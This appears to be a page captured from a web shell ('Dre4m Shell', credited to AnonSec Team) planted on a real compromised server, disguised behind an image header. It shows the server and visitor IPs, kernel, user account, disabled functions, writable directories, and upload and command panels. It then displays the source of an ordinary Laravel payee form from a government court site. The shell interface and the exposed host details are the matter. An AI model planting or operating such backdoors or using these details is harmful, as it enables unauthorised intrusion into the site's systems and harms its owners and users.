ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 18.226.94.88
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/e8405003b1a5e0b192eda5dbbbad2fef80a94ba5.php
<?php $__env->startSection('pageTitle'); ?>
VAT And WHT Payee
<?php $__env->stopSection(); ?>

<?php $__env->startSection('content'); ?>

      
<div class="box-body">
<div class="box box-default">
  <div class="box-body box-profile">
    <div class="box-body hidden-print">
    <div class="row">
    <div class="col-md-12">
         <?php echo $__env->make('Share.message', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
    </div>
<div class="box-body">
 <div class="col-xs-12 col-sm-12">
        <form class="form-horizontal" role="form" action="<?php echo e(url('/vat-wht-payee')); ?>" method="Post">
            <?php echo e(csrf_field()); ?>

            	<!--hidden field for updating record-->
            	<?php if(!empty($payeeRecord)): ?>
                   	<input type="hidden" class="form-control" name="updateID" value="<?php echo e($payeeRecord->ID); ?>" /> 
               	<?php else: ?>
               		<input type="hidden" class="form-control" name="updateID" />
               	<?php endif; ?>
            
            <div class="form-group">
                    <h4 class="box-title">VAT And WHT Payee</h4>
            </div>
            <div class="form-group">
            <div class="col-md-4">
                <label class="control-label">Payee</label>
                <?php if(!empty($payeeRecord)): ?>
                   	<input type="text" class="form-control" id="payee" name="payee" placeholder="Enter Payee" value="<?php echo e($payeeRecord->payee); ?>" /> 
               	<?php else: ?>
               		<input type="text" class="form-control" id="payee" name="payee" placeholder="Enter Payee" />
               	<?php endif; ?>
                	                  
            </div>
                       

            <div class="col-md-4">
                    <label class="control-label">Address</label>
                <?php if(!empty($payeeRecord)): ?>
                   	<input type="text" class="form-control" id="address" name="address" placeholder="Enter Address" value="<?php echo e($payeeRecord->address); ?>" > 
               	<?php else: ?>
               		<input type="text" class="form-control" id="address" name="address" placeholder="Enter Address"> 
               	<?php endif; ?>
                        
            </div> 
            
            <div class="col-md-4">
                    <label class="control-label">Bank Branch</label>
                    <?php if(!empty($payeeRecord)): ?>
                   	 <input type="text" class="form-control" id="bank_branch" name="bank_branch" placeholder="Enter bank" value="<?php echo e($payeeRecord->bank_branch); ?>">
                    <?php else: ?>  
                       <input type="text" class="form-control" id="bank_branch" name="bank_branch" placeholder="Enter bank">
                    <?php endif; ?>
            </div>
            
            <div class="col-md-4">
                    <label class="control-label">Bank</label>
                   	<select class="form-control" id="bankid" name="bankid">
                   	   <?php if(!empty($getBankNameID)): ?>
                   	   	<option value="<?php echo e($getBankNameID->bankID); ?>"><?php echo e($getBankNameID->bank); ?></option>
                   	   <?php else: ?>
                   	   	<option value="">--Please choose an option--</option>
                   	   <?php endif; ?>
                   	    <?php $__empty_1 = true; $__currentLoopData = $banklist; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $list): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); $__empty_1 = false; ?>
    			      <option value="<?php echo e($list->bankID); ?>"><?php echo e($list->bank); ?></option>
    			    <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); if ($__empty_1): ?>
    			    
    			    <?php endif; ?>
    			</select>  
            </div>
            
            <div class="col-md-4">
                    <label class="control-label">Account Number</label>
                    <?php if(!empty($payeeRecord)): ?>
                   	 <input type="text" class="form-control" id="accountno" name="accountno" placeholder="Enter acct no" value="<?php echo e($payeeRecord->accountno); ?>"> 
                    <?php else: ?>   
                    	<input type="text" class="form-control" id="accountno" name="accountno" placeholder="Enter acct no"> 
                    <?php endif; ?>
            </div>
            
            <div class="col-md-4">
                    <label class="control-label">Sort Code</label>
                    <?php if(!empty($payeeRecord)): ?>
                   	 <input type="text" class="form-control" id="sort_code" name="sort_code" placeholder="Enter sort code" value="<?php echo e($payeeRecord->sort_code); ?>"> 
                    <?php else: ?> 
                    	 <input type="text" class="form-control" id="sort_code" name="sort_code" placeholder="Enter sort code"> 
                    <?php endif; ?> 
            </div>

            <div class="col-md-4">
                <br>
               
                    <?php if(!empty($payeeRecord)): ?>
                     <button type="submit" class="btn btn-primary" name="add" value="submit">
                	<i class="fa fa-btn fa-floppy-o"></i> Update Record
                     </button>	
                    <?php else: ?>  
                     <button type="submit" class="btn btn-success" name="add" value="submit"> 
                    	<i class="fa fa-btn fa-floppy-o"></i> Add New Record
                     </button>	
                    <?php endif; ?>
                    
               	
                                
            </div>
            
            </div>
</form>
            

            <div class="table-responsive" style="font-size: 12px; padding:10px;">
                <table id="mytable" class="table table-bordered table-striped table-highlight" >
                    <thead>
                        <tr bgcolor="#c7c7c7">
                            	 
                            
                            <th> S/N</th>
                            <th >Payee</th>
                            <th >Address</th>
                            <th >Bank Branch</th>
                            <th >Bank</th>
                            <th >Account Number</th>
                            <th >Sort code</th>
                            
                            
                            <th >Delete</th>
                            <th >Edit</th>
                        </tr>
                    </thead>
	          <?php $i=1;?>
	          <?php $__currentLoopData = $getDB; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $list): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                   <tr>
                       <td><?php echo e($i++); ?></td>
                       <td><?php echo e($list->payee); ?></td>
                       <td><?php echo e($list->address); ?></td>
                       <td><?php echo e($list->bank_branch); ?></td>
                       <td><?php echo e($list->bank); ?></td>
                       <td><?php echo e($list->accountno); ?></td>
                       <td><?php echo e($list->sort_code); ?></td>
                       
                       <td>
                           <a style="color: red; cursor: pointer;" 
                            href="<?php echo e(url('/vat-wht-payee/delete/'.$list->ID)); ?>" 
                            onclick="return confirm('Are you sure you want to delete this item?')">
                            Delete
                            </a>
                        </td>
                        <td>
                       	     <a style="color:blue; cursor: pointer;" 
                       	     href="<?php echo e(url('/edit-vat-wht-for-payee/'.$list->ID)); ?>">Edit
                        </td>                 
                   </tr>
                <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                </table>
        
            </div>
            
    
    </div>
</div>
</div>
</div>
</div>

        </div>

    </div>


<?php $__env->stopSection(); ?>

<?php $__env->startSection('styles'); ?>
<style type="text/css">
    .modal-dialog {
width:10cm
}

.modal-header {

background-color: #006600;

color:#FFF;

}

</style>
<?php $__env->stopSection(); ?>

<?php $__env->startSection('scripts'); ?>
<script src="<?php echo e(asset('assets/js/jquery-ui.min.js')); ?>"></script>
<script src="https://cdn.datatables.net/1.10.16/js/jquery.dataTables.min.js"></script>
<script src="https://cdn.datatables.net/1.10.16/js/dataTables.bootstrap.min.js"></script>
<script>
    $(document).ready(function() {
    $('#mytable').DataTable();
} );
</script>
<?php $__env->stopSection(); ?>
<?php echo $__env->make('layouts.layout', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/nicngo5/grp.nicn.gov.ng/resources/views/vatwhtpayee/vatwhtpayeePage.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team